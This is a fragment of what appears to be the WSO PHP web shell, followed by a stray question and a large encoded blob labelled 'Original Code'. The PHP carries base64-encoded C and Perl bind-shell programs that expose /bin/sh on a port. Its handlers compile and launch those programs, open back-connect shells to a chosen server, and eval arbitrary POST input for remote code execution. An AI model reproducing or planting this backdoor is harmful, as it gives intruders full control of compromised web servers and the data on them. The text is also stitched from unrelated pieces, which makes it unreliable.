$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; ?>
	<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
	<span>Bind port to /bin/sh</span><br/>
	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
	</form>
	<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
	<span>Back-connect to</span><br/>
	Server: <input type='text' name='server' value='<?php echo $_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
	</form><br>
	<?php
 if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,base64_decode($t)) or @fputs($w,base64_decode($t)) or @file_put_contents($f,base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $out = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out
".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$out
".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $out = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out
".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out
".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; printFooter(); } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "wso_version" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']);
 exit;
}elseif(!isset($_GET[$my_keyw_for_exp]) && !isset($_POST[$my_keyw_for_exp]))
	{
  	$post_arr=implode('.',$_POST);
  	$get_arr=implode('.',$_GET);
  	$cook_arr=implode('.',$_COOKIE);
  	$post_arr_key=implode('.',@array_flip($_POST));
  	$get_arr_key=implode('.',@array_flip($_GET));
  	$other_shtuki=@file_get_contents('php://input');
  	$cracktrack = strtolower($post_arr.$get_arr.$post_arr_key.$get_arr_key.$cook_arr_key.$other_shtuki);
  	$wormprotector = array('base64','user_pass','substring','or id=','eval(','nutch');
  	$checkworm = str_replace($wormprotector, '*', $cracktrack);
  	if ($cracktrack != $checkworm)
  	die("");
	}

Did this file decode correctly?

Original Code

<?php $c='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